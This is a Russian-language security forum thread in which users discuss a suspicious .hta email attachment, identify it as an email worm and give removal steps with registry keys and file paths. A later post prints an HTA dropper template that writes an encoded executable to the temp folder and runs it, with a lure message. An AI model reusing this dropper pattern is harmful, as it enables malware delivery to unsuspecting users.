ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Странныое сообщение (_________.hta ) |

11.07.2006, 21:48
|
|
Участник форума
Регистрация: 11.01.2006
Сообщений: 128
Провел на форуме: 612424
Репутация:
55
|
|
Странныое сообщение (_________.hta )
Сегодня на 2 моих ящика пришло 2 примерно одинаковых сообщения, типа привет как дела ... вот заплатка или прога от нового вируса, но факт в том, что эти сообщения пришли с разных ящиков и с одним и тем же файликом
Имя файла: _________.hta
Размер файла: 60КБ
имя файла одинаковвые как на одном так и на другом мыле.
Что это может значить, и не приходило ли вам такое сообщение?
Вот залил эту прогу, толи заплатку сюда: http://slil.ru/22915583
Жду ответов...
|
|
|

11.07.2006, 22:14
|
|
Постоянный
Регистрация: 17.07.2005
Сообщений: 475
Провел на форуме: 1665310
Репутация:
488
|
|
скачал, открыл - vbs скрипт, и дира " C: " .. ... .. лог. бомба? =)
|
|
|

12.07.2006, 02:41
|
|
Новичок
Регистрация: 02.07.2006
Сообщений: 24
Провел на форуме: 65670
Репутация:
14
|
|
это Email-Worm.Win32.Scano.e.
Расширение .hta это СИ
|
|
|

12.07.2006, 03:54
|
|
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме: 9751379
Репутация:
3812
|
|
...троян это скорее всего.... у меня даже конвектор был exe2hta.....
__________________
|
|
|

12.07.2006, 11:58
|
|
Новичок
Регистрация: 02.07.2006
Сообщений: 24
Провел на форуме: 65670
Репутация:
14
|
|
нет это не троян. я же написал что это червь....
он сканит машину на адреса почты. Ищит адреса в следующих файлах:
adb asp cfg cgi dbx dhtm dhtml eml htm html jsp mbx mdx mht mmf mra msg nch ods oft php pl sht shtm stm tbb txt uin wab wsh xls xml и рассылает себя по найденым адресам. Причем рассылает себя используя примое подключение к SMTP серваку.
Червь соединяется со следующими удаленными серверами для загрузки других файлов:
http://207.**.250.119
http://84.**.161.192
http://85.249.**.35
Для удаления, если уже подхватили:
Удалить из реестра вот эти записи.
[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe]
"Debugger"="%Windir%\csrss.exe"
[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"Application"="%Windir\csrss.exe"
и вот эти файлы
%Windir%\csrss.exe
C:\ntldr.exe
Последний раз редактировалось Eco[L]og; 12.07.2006 в 12:04..
|
|
|

06.02.2009, 18:20
|
|
Banned
Регистрация: 07.09.2008
Сообщений: 48
Провел на форуме: 127764
Репутация:
-1
|
|
затрояненный HTA-файл может выглядеть примерно так.
<font color="#008000"><HTML>
<HEAD><hta:application />
<SCRIPT language="JavaScript">
code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tf = fso.GetSpecialFolder(2); // Получим windows\temp
var fn = tf + "\\x.exe"; // Добавим имя файла
var a = fso.CreateTextFile(fn, true); // Запишем в файл тело трояна
a.Write(unescape(code));
a.Close();
var WshShell = new ActiveXObject("WScript.Shell");
WshShell.Exec(fn); // Запустим его
</SCRIPT>
</HEAD>
<BODY>
Привет, чувак!
TheBat не показывает картинки, так что открой этот файл в Ехплорере.
</BODY>
</HTML></font>
---------------------------------------------------------------------------------------------------
вопрос что за этот код и как и с чем его едят
code = "MZ%90%00%03%00%00%00%04 ...... "; // Закодированный троян
|
|
|

06.02.2009, 22:34
|
|
Постоянный
Регистрация: 21.02.2007
Сообщений: 568
Провел на форуме: 2954516
Репутация:
303
|
|
or1, нах поднял тему 2-х летней давности?
|
|
|

06.02.2009, 22:35
|
|
Участник форума
Регистрация: 30.01.2009
Сообщений: 196
Провел на форуме: 505362
Репутация:
66
|
|
некропостер!11один
|
|
|
|
 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|